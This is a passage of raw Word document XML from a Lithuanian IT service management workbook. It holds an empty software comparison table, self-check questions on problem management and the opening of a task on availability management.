                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindiniai privalumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BB7F2B5" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindiniai trūkumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="639" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AE6C83E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina, siūlomas planas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5DC333F1" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="27277D21" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="30F8138F" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3813341C" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53C2E3DF" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="639" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="76ACC9B6" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41CE160B" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="24AC82E3" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09260C3E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="13B06ED5" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72989FB7" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="639" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6434347A" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C808AA" w:rsidRPr="005A5C28" w14:paraId="4A6F1325" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A308927" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="530A58E3" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F00CD63" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6CD42F65" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="639" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="232B2D21" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="223E4936" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8B5D21" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F80A3E3" w14:textId="25CEEDE4" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Management Software. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Capterra</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId129">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.capterra.com/incident-management-software/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="031F0F5B" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599CBC7F" w14:textId="7F4D4EEF" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00555F01" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PROBLEMŲ VALDYMAS</w:t>
      </w:r>
      <w:r w:rsidR="0064789D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064789D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SAVIKONTROLĖS KLAISIMAI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF834F2" w14:textId="01583B20" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIES SĄLYGA: Atsakykite į klausimus</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir atlikite užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09140C79" w14:textId="59359B62" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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Kas yra problemų valdymas‎ ir kuo</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ji</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>skiriasi nuo incidentų valdymo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F2871" w14:textId="3D3E2E19" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išvardinkite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> problemų valdymo tiksl</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F5083" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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Apibūdinkite problemos gyvavimo ciklą.‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730AD25" w14:textId="591782AE" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>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w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pakomentuokite,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>problemų valdymo naud</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>‎?</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Paaiškinkite, kuo </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>yra naudinga problemų valdymo sistema?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F5271" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BA5F0B" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCDFFE" w14:textId="5005A527" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ITSM Basics: A Simple Introduction to Problem Management (2015, liepos 14). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sysaid</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId130">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-problem-management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33F0A9ED" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B3B9A6" w14:textId="2252E88E" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASIEKIAMUMO VALDYMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E5D2E6" w14:textId="498EC7EC" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIES SĄLYGA: Apibūdi</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
